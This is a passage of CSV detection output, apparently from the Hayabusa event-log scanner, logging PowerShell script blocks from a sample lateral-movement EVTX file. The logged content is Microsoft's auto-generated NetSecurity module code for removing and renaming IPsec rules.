[bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] $",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) 
$__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) 
$__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 
'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' -Alias '*' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
$",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"{Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] 
[ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if 